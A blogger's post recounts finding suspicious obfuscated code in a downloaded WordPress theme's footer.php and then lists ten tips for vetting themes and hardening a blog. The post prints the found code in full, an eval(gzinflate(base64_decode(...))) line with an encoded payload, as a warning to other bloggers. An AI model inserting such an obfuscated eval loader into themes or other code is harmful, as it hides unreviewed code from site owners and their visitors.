My Work log 2
In the span of my Blog life, I change my Theme a couple of times. The first one that I use was the “Yellow Jacket” of Anthony Baggets, But I found out that two column theme or with only one sidebar is not enought with all the stuff I want to put in my blog, so I try a couple of theme and I spend almost a month looking for the right Theme that I can use for the rest of my blog life. And so I ended up downloading my final theme from (I choose not to name the site), they really have a nice line of theme in all category you can think of.
So I download a couple of Theme from that site, upload it to my site and test it to know what it’s really look like base on my blog contents. But what come out all my three or two sidebar theme which I thought was, is only show one sidebar. So what happen is to check all the css and php coding the theme creator use to define all the files inside the theme. Which is really a pain in the ass for a noobz in css and php language like me. I have three choices of theme and all of them have the same problem so what I did is to pick what I really like and start from there. So to make story short, it was good that everything is not properly set so I got a chance to look on every code inside the theme and found all the evil stuffs inside my theme.
This is the code I found out in my theme, “footer.php” (obviously not a php code) file that make me too suspicious and put me to spend weeks googling how to know how evil is my theme was.
<?php eval(gzinflate(base64_decode('lVJNT8MwDD3TX2HCZUi0FVdIM8EEAgkJhKZxnLLWXSK1cUjSVfDrSdvxJeBATo
97Pf8MRcJr/QOdFWwmiigYyI5gPgSAG4Fr8kE8PoVC3bKoJZlNFboKmnkCVw4LZsTuMFmh0GX0eOl8alHp2smHqh
HhxVsXoBLUA7rgqkQ7Fme9+Qq69D7zDpisLxd3l0V7NohwtN7CJYKW/Rsr6GkhlzBjhbjY+ITlwxyJzDPB6zguRQZ
LBzKEPkvf+Hv+2wr202DijqPWUnth4qVLGXQZOARTZDNnwLuTaMNTuwL6bWhb+yXjrqtCr92H9l7G0bFdex5o
M8ZBB2aON3/D+BH7x+m3S+TH6Yp8LlVFrBUBFsMa9O16+curgr97Pgc5gL2v2yPDLpFt/aB7Ox0AngsyVQRkK
Zi6PuA5/F4xFj9aDqfMZR89XdG79B5hEzVGNcxAUaG3q6nrNlxLD+kbah6iSeZq9A2YgQl8AY=')));?>
Giving credit to the creator and sponsor of the theme is not a problem to me as long it’s fair and safe.
So I ask you guys, how safe your theme, did you check your theme? Remember, even the wordpress.org have a problem to all sponsored theme submitted to them. Some bloggers didn’t realize that the Wordpress Themes they had recently downloaded and installed on their blogs had hidden links, unwanted advertising, and other nasty stuff. So here’s a couple of suggestion and application I google around the blogosphere before you upload them to your web host server:
1. Search the Theme Files, template files for http://: and check every link reference within the files. If there is a link going somewhere you don’t want it to go, remove it or change the url with another name or try another Theme.
2. Search for “script”: Search your template files for the word “script”. This indicates a Javascript. It could be a safe one, put there to help with the design, thus it would be mentioned within the Theme’s readme file or the link would go to a file within your Theme’s folder you could check to see what the script does. If it links to an off-site location, or looks suspicious, it might be.
3. View the Generated Page Source: Using your browser’s View > View Page Source feature, view the source code for your generated WordPress blog’s web page. You might not understand all of it, but look closely at all the code to see if something it linking to an off-site location or a bit of code that looks odd or like an advertisement, like what I found im my footer where they usually put the code. It could be.
4.Testing it with the WordPress Theme Scanner Plugin before using it.
5. Remove the Version Meta Tag: In your blog’s header.php template tag, remove the meta tag named “generator” which states which version of WordPress you are using. Which only help hackers know which version you are using so they can easily choose the scalpel to hack away at your blog.
6. Prevent Access to Your WordPress Folders: If you check your Plugins directory in a browser with www.example.com/wp-content/plugins you may see a listing of all of the Plugin files and directories. So can everyone else. The same may go for some of your other WordPress directories.
7. Change File Permissions: You can set some of your files and directories to allow various degrees of access, be it to totally prevent all access to changing the file in any way, to only allowing access to change a file by a user/program authority. “Changing File Permissions” from the WordPress Codex explains how to change those file and folder permissions on your server, but if you do change them to make them have temporary wide open access, change them back afterwards.
8. Prevent Login Access. Try using Login LockDown Plugin which can help increase security and reduce the chance of someone hacking into your WordPress installation
9. Monitor Your Blog For Downtime and Breakdowns.The breakdown can happen immediately, or be overlooked, or happen unpredictably. Very rare the evil doers was the culprint, It’s usually something the blog owner has done that breaks the blog.
10. Backup your WordPress blog database, your WordPress Themes and Plugins directories, your files and images and all non-WordPress specific files.
Before installing and activating a WordPress Plugin or Theme, or making any changes to your WordPress blog, back it up! This way, if something does happen Be it for evil reasons or just “one of those glitches in the system” reasons, you have a replacement to put it right back to the time and place where it was last right.
My best and last tip to say, don’t Do Dumb stuff, when in Doubt, Dont.
I ask all bloggers with experience like this to share all their solution and what evil stuff they found out inside their themes to help and make other bloggers aware with this evil doing by others. Let’s keep Wordpress Blog Safe!
Source: www.lorelle.wordpress.com / www.blogsecurity.net
